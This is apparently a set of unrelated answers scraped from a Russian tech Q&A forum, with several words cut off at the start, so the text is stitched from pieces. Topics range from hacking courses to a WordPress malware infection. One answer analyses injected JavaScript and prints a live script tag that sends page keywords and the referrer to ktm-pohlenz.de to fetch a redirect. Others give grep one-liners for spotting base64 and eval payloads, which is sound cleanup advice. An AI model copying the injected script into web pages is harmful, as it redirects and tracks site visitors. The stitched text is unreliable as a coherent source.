Константин

завоевать авторитет сообщества.

Пхаха.

акже команда боится, что злоумышленники разгадают нашу апишку и создадут миллион похожих сайтов.

Расслабьтесь, всем на него плевать. Я серьёзно.

асскажите, пожалуйста, какие могут быть проблемы с безопасностью, если опубликовать код фронтенда на Гитхабе.

Если фронт кривой и с паролями доступа в самом коде, то, конечно, небезопасно. Если он нормальный и более-менее соблюдает принципы безопасности, то выкладывайте, таких мёртвых репозиториев - половина Гитхаба, ваш будет просто один из них.

Купите новый телефон.

Курсы. По хакингу. Для новичков.


Это абсолютно несовместимое сочетание слов!

Почитайте этот ответ и комментарии к нему. И этот ещё полезно будет.

на курсах далеко не уедешь: они рассказывают основы и давно прикрытые дыры.
для хакинга нужны не курсы, а
1 мозг (это самое ценное)
2. знание сетевых протоколов
3. знание целевой системы

остальное: совершенствование своих навыков в выше перечисленном и постоянное чтение cve и их анализ.

нет таких книг, есть wordpress codex

Обычно да. Просто переносите и импортируете.

На инженера-программиста может пойти и обладатель кулинарного средне-специального образования. Или человек вообще без средне-специального образования.

Начните с университетского курса по ИБ. Реверсинжиниринг, анализ трафика, навыки программирования, аудит инфобезопасности и анализ защищенности, системное администрирование, криптоанализ, безопасность мобильных приложений.... Вот это и есть "основа основ". Разумеется, для того, что-бы участвовать в соревнованиях к этим основам надо существенно "добавить" всякого, чего можно поверх теории освоить исключительно из практики.

rdesktop/remmina

1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:

<script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>

P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.

Сам отвечаю - перестало появляется
Поискал все файлы на слово base64 заметил что в трех картинках есть это слово - удалил, перестало появлятся

слово base64 само по себе не зло, в обычном php часто встречается, но в картинках его быть не должно

теперь периодически ищю скриптом

#!/bin/bash
find . -iname '*.gif' -type f -print| xargs grep "base64" > result.txt
find . -iname '*.jpeg' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.jpg' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.htm' -type f -print| xargs grep "base64" >> result.txt
find . -iname '*.html' -type f -print| xargs grep "base64" >> result.txt
find . -type f -print| xargs grep -i "uniplacer" >> result.txt

У вас где-то залит shell-скрипт. В идеале нужно все переустановить.
Wordpress в обязательном порядке, тему и все плагины. Если на сервере под одним пользователем несколько сайтов, то такой враг может быть в любом из них.

Если у вас есть доступ к серверу по SSH, то выполните команду

find . -type f -name '*.php' | xargs grep -l "x63" --color

или

find . -type f -name '*.php' | xargs grep -l "x47" --color

"точка" после find обозначает искать в папке, в которой находитесь, замените ее на путь к папке, где лежат ваш сайт или сайты или вообще заменить на слеш / тогда искать будет по всему серверу.

Команда ищет файлы в содержании, которых есть текст "x63" или "x47". В 99% случаях из таких кодов состоит шифровка вражеских вирусов. Обратите внимание на файлы, которые найдет команда. Откройте их и посмотрите содержание. Код вируса вы сразу увидите, он весь шифрованный base64 и присутствуют команды eval. Чистите или восстановите данные файлы на чистые.